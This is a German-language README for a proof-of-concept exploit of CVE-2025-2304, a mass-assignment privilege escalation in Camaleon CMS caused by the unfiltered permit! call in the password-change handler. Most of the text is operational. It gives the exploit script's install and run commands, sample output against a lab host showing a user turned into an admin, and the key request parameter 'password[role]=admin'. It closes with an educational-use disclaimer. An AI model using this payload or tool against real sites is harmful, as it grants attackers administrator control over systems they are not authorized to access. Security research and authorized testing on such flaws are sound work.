
PoC für CVE-2025-2304 Privilegienerweiterung im Camaleon CMS
Camaleon CMS ist anfällig für Privilegienausweitung durch Mass Assignment
Im Camaleon CMS existiert eine Privilegienausweitung durch Mass Assignment.
Wenn ein Benutzer sein Passwort ändern möchte, wird die Methode 'updated_ajax' des UsersController aufgerufen. Die Schwachstelle resultiert aus der Verwendung der gefährlichen Methode permit!, die alle Parameter ohne jegliche Filterung durchlässt.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - Basis-URL der verwundbaren Anwendung-u - Benutzername für die Authentifizierung-p - Passwort für die Authentifizierungpython exploit.py --url http://facts.htb -u krrish -p krrish
Output:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=adminDieses Tool dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Unbefugter Zugriff auf Computersysteme ist illegal.